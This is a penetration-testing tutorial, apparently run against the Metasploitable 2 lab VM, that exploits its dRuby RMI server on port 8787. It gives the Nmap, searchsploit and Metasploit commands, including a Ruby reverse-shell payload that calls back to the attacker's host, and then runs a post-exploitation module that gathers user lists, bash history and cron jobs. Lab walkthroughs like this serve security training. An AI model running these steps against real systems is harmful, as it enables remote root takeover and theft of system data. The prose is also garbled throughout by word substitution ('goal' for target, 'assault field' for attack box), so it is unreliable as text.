In this tutorial we shall be hacking dRuby utilizing a distant code execution vulnerability within the dRuby RMI server that’s operating on Metasploitable 2. dRuby is a distributed object system for Ruby and is written in Ruby. dRuby makes use of its personal protocol and binds itself to a URI akin to druby://instance.com on port 8787. By default port 8787 isn’t scanned by Nmap since it’s not included within the checklist of 1.000 frequent ports that are scanned by default when no further port choices are specified. Open port 8787 on Metasploitable 2 would stay unnoticed except we’d be utilizing the -p- flag to scan all 65535 ports or use a port vary which incorporates port 8787. This instance reveals us how necessary it’s to at all times run a full port scan on a goal when performing community enumeration. We may simply be lacking essential info which can be utilized to compromise the goal.
Hacking dRuby RMI Server 1.8 with Metasploit
We will begin the dRuby hacking tutorial with scanning port 8787 with Nmap after which we shall be performing a vulnerability evaluation. Than we shall be hacking dRuby RMI server utilizing Metasploit by exploiting the discovered vulnerabilities. We will conclude this tutorial with a Metasploit submit exploitation script to collect info from the compromised system and evaluation the teachings realized.
Nmap scan on port 8787
Let’s run the next command on the console to carry out a Nmap Service scan on Metasploitable on port 8787:
nmap -sV [IP] -p8787
As we already anticipated port 8787 is open and Ruby DRb RMI server model 1.8 is operating on the goal host. Let’s see what vulnerabilities can be found for this model of distributed Ruby (dRuby) utilizing searchsploit.
Searchsploit dRuby exploits
Let’s attempt to search the searchsploit database utilizing an actual match search utilizing the -e flag:
searchsploit -e Ruby DRb RMI
The actual match question doesn’t return any outcomes. This implies that we’ve to make use of a extra normal search time period. We may very well be eradicating RMI from the search time period and if that doesn’t return any outcomes both, we will simply seek for Ruby exploits and undergo the outcomes one after the other. Personally I might counsel to make use of this strategy, the place we go from particular search phrases to normal search phrases, when a normal search time period returns too many outcomes. For instance the search time period PhrasePress returns 100’s of outcomes and ‘WordPress 3’ solely 9.
When we search Searchsploit for Ruby exploit utilizing the next command we’re offered with lower than 30 outcomes:
When we undergo the checklist of exploits we will see 2 exploits for Distributed Ruby which are value to additional look at. Let’s slender the outcomes by looking for ‘Distributed Ruby’:
Remember to place within the -e flag in our command to solely present outcomes which have a direct match with this search time period. Let’s try the Distributed Ruby Send instance_eval/syscall Code Execution exploit. When we use the next command we will get some further details about the explout and the trail to the exploit is copied to the clipboard:
searchsploit -p 17058
Next we will test the file contents utilizing the next command:
Metasploit: hacking dRuby RMI server 1.8
We can see that we’re coping with a Metasploit exploit right here. Let’s fireplace up Metasploit and seek for the exploit there. Run the next command to begin the msfconsole:
Since we all know the title of the exploit we will search solely the title subject utilizing the next command:
search title:Distributed Ruby Send instance_eval/syscall Code Execution
And then choose the exploit utilizing the use command:
Let’s set a Ruby reverse shell payload for this exploit first utilizing the next command:
set payload cmd/unix/reverse_ruby
Use the choices command to indicate the obtainable choices for this exploit:
Next we have to set the LHOST for the payload:
set LHOST [IP attack box]
And we set the URI utilizing the next command (the anticipated format is talked about within the description):
set URI druby://[Target IP]:8787
The listening port will be left as is. All that is still now could be operating the exploit utilizing the exploit command and if all the pieces is completed accurately a reverse shell with root privileges is returned to the assault field:
Post exploitation info gathering
Let’s go one step additional and take a look at one of many submit exploitation/info gathering modules obtainable for Linux, the enum_system module. We can choose this module by backgrounding the command shell session 1 utilizing CTRL + Z. It will than ask us to background the present session, verify with ‘y’.
Next choose the enum_system module utilizing the next command:
Type the data command to see what this module precisely does:
The description tells us that the modules gathers system info akin to put in packages, put in companies, mount info, consumer checklist, consumer bash historical past and cron jobs.
To run this submit collect module we have to level the module to the lively session by utilizing the next command:
set session 1
Now sort run to execute the module:
We can see that each one info is downloaded to our assault field and saved on the following location:
To look at the recordsdata you possibly can simply merely cd to the situation and cat the contents of the textual content recordsdata to the console.
In this exploiting tutorial we’ve realized a couple of necessary issues when penetration testing. Let’s evaluation the teachings realized on this Hacking Tutorial.
Scan all ports
The very first thing we’ve realized is that we have to scan all obtainable ports on a traget host when performing a penetration check. When we’re operating the default NMap port scans solely the highest 1000 ports are scanned. In this tutorial we’ve compromised a number utilizing a service operating on a port which was not in NMap’s default port checklist.
Search exploits in an efficient and environment friendly manner
We’ve additionally realized use searchsploit successfully when too many outcomes are returned or none. A great strategy when a normal search time period returns to many outcomes is to go from very particular to extra normal search phrases. Very particular may very well be the service title together with the model quantity and a extra normal search time period may very well be solely the service title. In this tutorial the search time period ‘Ruby DRB RMI’ didn’t return any outcomes however ‘Distributed Ruby’ obtained us the outcomes we have been in search of.
Post info gathering and exploitation
Last however not least we’ve seen a glimpse of certainly one of Metasploit’s submit collect modules: enum_system. after hacking dRuby you possibly can download some necessary info from the compromised host to our assault field utilizing the The enum_system module. Such as log recordsdata, setuid/setgid recordsdata and companies. Post info gathering and exploitation is and necessary a part of each penetration check. In this case we obtained root entry to the host on the primary reverse shell. More typically a privileged shell is returned and submit exploitation methods must be used for privilege escalation. In tutorials to observe we shall be going into extra particulars on submit exploitation and privilege escalation.